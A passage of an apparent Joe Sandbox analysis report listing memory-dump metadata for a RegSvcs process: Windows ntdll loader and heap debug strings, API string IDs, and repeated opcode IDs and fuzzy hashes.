                                                                          • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                          Strings
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 015582E8
                                                                          • LdrpInitializePerUserWindowsDirectory, xrefs: 015582DE
                                                                          • Failed to reallocate the system dirs string !, xrefs: 015582D7
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                          Strings
                                                                          • @, xrefs: 0159C1F1
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0159C1C5
                                                                          • PreferredUILanguages, xrefs: 0159C212
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                          Strings
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                          Strings
                                                                          • LdrpCheckRedirection, xrefs: 0156488F
                                                                          • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01564888
                                                                          • minkernel\ntdll\ldrredirect.c, xrefs: 01564899
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                          Strings
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                          Strings
                                                                          • Process initialization failed with status 0x%08lx, xrefs: 015620F3
                                                                          • minkernel\ntdll\ldrinit.c, xrefs: 01562104
                                                                          • LdrpInitializationFailure, xrefs: 015620FA
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                          APIs
                                                                          Strings
                                                                          Similarity
                                                                          • API ID: ___swprintf_l
                                                                          • String ID: #%u
                                                                          Strings
                                                                          • LdrResSearchResource Enter, xrefs: 014EAA13
                                                                          • LdrResSearchResource Exit, xrefs: 014EAA25
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                          • API String ID: 0-4066393604
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: `$`
                                                                          • API String ID: 0-197956300
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: Legacy$UEFI
                                                                          • API String ID: 2994545307-634100481
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$MUI
                                                                          • API String ID: 0-17815947
                                                                          Strings
                                                                          • kLsE, xrefs: 014E0540
                                                                          • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 014E063D
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                          • API String ID: 0-2547482624
                                                                          Strings
                                                                          • RtlpResUltimateFallbackInfo Enter, xrefs: 014EA2FB
                                                                          • RtlpResUltimateFallbackInfo Exit, xrefs: 014EA309
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                          • API String ID: 0-2876891731
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID: Cleanup Group$Threadpool!
                                                                          • API String ID: 2994545307-4008356553
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: MUI
                                                                          • API String ID: 0-1339004836
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID: 0-3916222277
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID: 0-3916222277
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: GlobalTags
                                                                          • API String ID: 0-1106856819
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: .mui
                                                                          • API String ID: 0-1199573805
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: EXT-
                                                                          • API String ID: 0-1948896318
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: BinaryHash
                                                                          • API String ID: 0-2202222882
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: #
                                                                          • API String ID: 0-1885708031
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: BinaryName
                                                                          • API String ID: 0-215506332
                                                                          Strings
                                                                          • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0156895E
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                          • API String ID: 0-702105204
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: db1f0156318a66a7e4c847f1d93f7134222196607b1c3b360ef12c025d01d2c8
                                                                          • Instruction ID: f5457f8c339686a1d6c2da7240ccc416d893d9e5c8781f40b95061b66a5b23a0
                                                                          • Opcode Fuzzy Hash: db1f0156318a66a7e4c847f1d93f7134222196607b1c3b360ef12c025d01d2c8
                                                                          • Instruction Fuzzy Hash: F732EE70A007568BEB24CF69C844BBEBBF2BF86308F24451ED5869F385D775A846CB50
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7077eb1337b0a73435fe6029e25abdc76da3ae6e5e11e7981ec1cc20be99d1bc
                                                                          • Instruction ID: 800fcd5ed4fa4542f92183567cffdf5587c63748e5d5beb5ed9dfeedf1559da1
                                                                          • Opcode Fuzzy Hash: 7077eb1337b0a73435fe6029e25abdc76da3ae6e5e11e7981ec1cc20be99d1bc
                                                                          • Instruction Fuzzy Hash: 0B22B1706046618BEB25EF2DC05037ABBF1BF44304F08885BD997AF296E775E492DB60
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3cb17642b453660e77e576443d12ca1b66a7c8aaaccc9efc4e5111e92035f82b
                                                                          • Instruction ID: 4f2baffd6639c28215f5cff03bb79d0875b7d8585f9837703362e707e58cf5bc
                                                                          • Opcode Fuzzy Hash: 3cb17642b453660e77e576443d12ca1b66a7c8aaaccc9efc4e5111e92035f82b
                                                                          • Instruction Fuzzy Hash: EC32CD71A00615CFDB25CF68C484BAEBBF1FF58314F15856AE956AB3A1D730E842CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                          • Instruction ID: e4a738368f6b0a2d044779c35a432849efeeed24b0683d59dd3c18307ccec496
                                                                          • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                          • Instruction Fuzzy Hash: 5AF16F71E0061A9BDF26CFD9D590BAEBBF5BF48714F048129EA05AF280E774D841CB60
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a1cc9b044c476230704955efc04f6befa2b43328a9427ac89f69e199b73c757d
                                                                          • Instruction ID: 746875d54c5d4777fd7d8ba1800a9348f487cc481d399004d0806362f61b3f83
                                                                          • Opcode Fuzzy Hash: a1cc9b044c476230704955efc04f6befa2b43328a9427ac89f69e199b73c757d
                                                                          • Instruction Fuzzy Hash: 52D10171A0060A8BDF05CF69D846BFEBBF1BF88314F188169D959AB241E735E905CB60
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7a97fc9c4247df0686bdab13d98b680857a6fbcd0d477af117e9d3d3d493098e
                                                                          • Instruction ID: 830b893b7b47b14c3826543ccdfed164f428bd4a43dee13dba1f1d7dfbcc10ad
                                                                          • Opcode Fuzzy Hash: 7a97fc9c4247df0686bdab13d98b680857a6fbcd0d477af117e9d3d3d493098e
                                                                          • Instruction Fuzzy Hash: 4BE19F71508342CFC715CF28C494A6BBBE0FF99315F068A6EE9998B361D731E905CB92
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4102062cbd3641dbcde9f4b9ee81b3f812de3842898c377f3d1c60ca2beaec84
                                                                          • Instruction ID: 67894f39d4dbca4c80f04fba35aab2fff4d7513135906babd6cabd5b1ab54337
                                                                          • Opcode Fuzzy Hash: 4102062cbd3641dbcde9f4b9ee81b3f812de3842898c377f3d1c60ca2beaec84
                                                                          • Instruction Fuzzy Hash: F7D1E0B1A002079BDF14DF69C8A1ABE77B5FFA4304F05422EE916DB2A1E730D951CB60
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                          • Instruction ID: bbdbf530088368046ce361e754deac8c1731ab941213c11b64f0468bf8475b11
                                                                          • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                          • Instruction Fuzzy Hash: 7FB16074A00705AFDF24DF99C940AAFBBBDFF84304F14446DAA429B794DA34E945CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                          • Instruction ID: bbd7a1f2181b920e44fe3293ab04278abf41a834f5059ef61b08a2a2ec61c86b
                                                                          • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                          • Instruction Fuzzy Hash: 75B10631600646AFEB25DB68C854BBEBBF6BF84304F14019EE656DB392D770E941CB50
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bd476199de0e83c2c619ea171e8bd80d92611f5ca362380e20dcbe0ce72bc049
                                                                          • Instruction ID: bf8a745c20f2889e8714358369a37ed90548b65b289d696338bfd037b0f5b0ff
                                                                          • Opcode Fuzzy Hash: bd476199de0e83c2c619ea171e8bd80d92611f5ca362380e20dcbe0ce72bc049
                                                                          • Instruction Fuzzy Hash: 71C159745083418FD764CF19C484BABBBE5BF88308F44496EE9898B3A1DB74E949CF52
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3132559d6ca3cebc88650be0739944e81202216faec9526870b15fb09bcf432e
                                                                          • Instruction ID: 9f4a03300bafe603b0607f9860b485519b32e58ab83486e7254431387f9c3db4
                                                                          • Opcode Fuzzy Hash: 3132559d6ca3cebc88650be0739944e81202216faec9526870b15fb09bcf432e
                                                                          • Instruction Fuzzy Hash: EBB17470A002668BDF65CF59C8A0BADB3B1FF94700F4485EED54AEB291DB309D85CB20
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0652699780d01e62d17610e41cc2a58ecb7d2308771cc376d49d383ed1b163d5
                                                                          • Instruction ID: 4c48e0240a3c40f8a24c8940d63b6b89e9625c86f2ccec7443ae1788d9e88bc7
                                                                          • Opcode Fuzzy Hash: 0652699780d01e62d17610e41cc2a58ecb7d2308771cc376d49d383ed1b163d5
                                                                          • Instruction Fuzzy Hash: DDA10231E002569FEB32DBACD845BAEBBA4FB41718F250526EA10AF2D1D7749D40CBD1
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2af24ac449e3bf9c1c3fc5c75735ce4f04729f3679796b421505d9f1a866d662
                                                                          • Instruction ID: e64f3e639550910305b7aed7875384c1affa8a836f3fc626c2278b5b9db23590
                                                                          • Opcode Fuzzy Hash: 2af24ac449e3bf9c1c3fc5c75735ce4f04729f3679796b421505d9f1a866d662
                                                                          • Instruction Fuzzy Hash: 1AA1B072B02626DFDB25CF69C590BAEB7A1FF55314F00412AEA059F2C1DB38E815CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b328c65b381f4b4e3eaa206bfb94ea29448bc525dd04a44f60b7065feb0af013
                                                                          • Instruction ID: dc328af2e20005e46e1694505548c5f62b6f6ddbeec4e8139e7a3905f0e68e6f
                                                                          • Opcode Fuzzy Hash: b328c65b381f4b4e3eaa206bfb94ea29448bc525dd04a44f60b7065feb0af013
                                                                          • Instruction Fuzzy Hash: EBA1AE72A04652EFC721DF18C980BAAB7E9FF58704F05492DF6869F662D334E901CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cc222be9783826562ec61d466dc7472cb30fc2c741a9509787a3eee5834584dd
                                                                          • Instruction ID: 74c5dc8914433e4b9f0d9a461b9cd2fd5d66e4f8ad477615163c116ae37b02e2
                                                                          • Opcode Fuzzy Hash: cc222be9783826562ec61d466dc7472cb30fc2c741a9509787a3eee5834584dd
                                                                          • Instruction Fuzzy Hash: A2916E71E00216AFDB15CFA9D894BAEBBB9BF48710F154169E610AF351D734EA009BE0
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6dd3a3a910ba316a86b1c379c8eacced36337caf93c7af0ee55f1a8dde6ae78b
                                                                          • Instruction ID: ed9f7ba0130d4cd73d31d0ea3c2912faad15121e8b0ae511a4ee7411a151a5fe
                                                                          • Opcode Fuzzy Hash: 6dd3a3a910ba316a86b1c379c8eacced36337caf93c7af0ee55f1a8dde6ae78b
                                                                          • Instruction Fuzzy Hash: CD910335A00616CBEB24DB9DC444B7EBBA1FB98719F06406EEA05AF3B1E734D902C751
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e41838a847db2eb75bae22ffade5278c14de75d00c2459537d0930ccce00f744
                                                                          • Instruction ID: 136ad3912350a2f7af52a4e8abe925ebc9a6a37363eca5f856331262e7f76e49
                                                                          • Opcode Fuzzy Hash: e41838a847db2eb75bae22ffade5278c14de75d00c2459537d0930ccce00f744
                                                                          • Instruction Fuzzy Hash: 8281A871E0061AAFDB18CF69C950ABEBBF9FB88700F04452EE555DB640E734DA40CB54
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                          • Instruction ID: 37959daa3bea2606424723f6c34320b09ed53ce4e430dcbc882cd9f46c53674b
                                                                          • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                          • Instruction Fuzzy Hash: AA816F71A4020A9FDF19CF99C490AAEBBF6BF88310F588569E9169F345D734E901CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ae0b31599e6385812d6c25a4f594f763cef855b9fe340488d26454dfb8e4fb3b
                                                                          • Instruction ID: bf6351aa352becc2f8f35d52ff22b137bd25fdbbd57560ac1dc19a5eef42c231
                                                                          • Opcode Fuzzy Hash: ae0b31599e6385812d6c25a4f594f763cef855b9fe340488d26454dfb8e4fb3b
                                                                          • Instruction Fuzzy Hash: 69817371A00609DFEB26CFA9C891BDEBBF9FF88314F104429E955AB254D730AC45CB60
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8a588617ff412f8594fc71fece274acb35b65ee57959be41f2d7f1978ee2367d
                                                                          • Instruction ID: 385f790e4e52638cdc426987a0186ad9b2b2dd11dd0f0e5fe78e1d283d6091e2
                                                                          • Opcode Fuzzy Hash: 8a588617ff412f8594fc71fece274acb35b65ee57959be41f2d7f1978ee2367d
                                                                          • Instruction Fuzzy Hash: D071CF75C0562ADBCB258F99C890BBEBBF0FF58714F15411EE992AB360D3309805CB90
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          • Instruction ID: 998fe84ba398b4fdf926eeb9dff8852b869a5128916cf29bc849434ce6506cf3
                                                                          • Opcode Fuzzy Hash: d0cf18a81684f0f467cab6e80de63690030b91e665a87dadb79f2b1347039673
                                                                          • Instruction Fuzzy Hash: 3C419B32941306CFDF22DFA8D494BAD7BB0FB58214F060599D425AF3E1DB359904CBA0
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b5ed44ddd6bd4cbed1a532fe01b51dc411cea94d1ffdef72ae6fcbee2baea2c1
                                                                          • Instruction ID: 9e538201d1321753ab6356692f4daafb7499dcd616ccbb4dbb889c224e65bee7
                                                                          • Opcode Fuzzy Hash: b5ed44ddd6bd4cbed1a532fe01b51dc411cea94d1ffdef72ae6fcbee2baea2c1
                                                                          • Instruction Fuzzy Hash: CE410232901203CBDB348F49D888A6ABBF2FBA5714F15816EE5219F765C335D842CF90
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2340505383.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014B0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_14b0000_RegSvcs.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d133f1c88479ddd83a13c52f181f1790852bf9864b88ae976fe7f2983bcb0c15
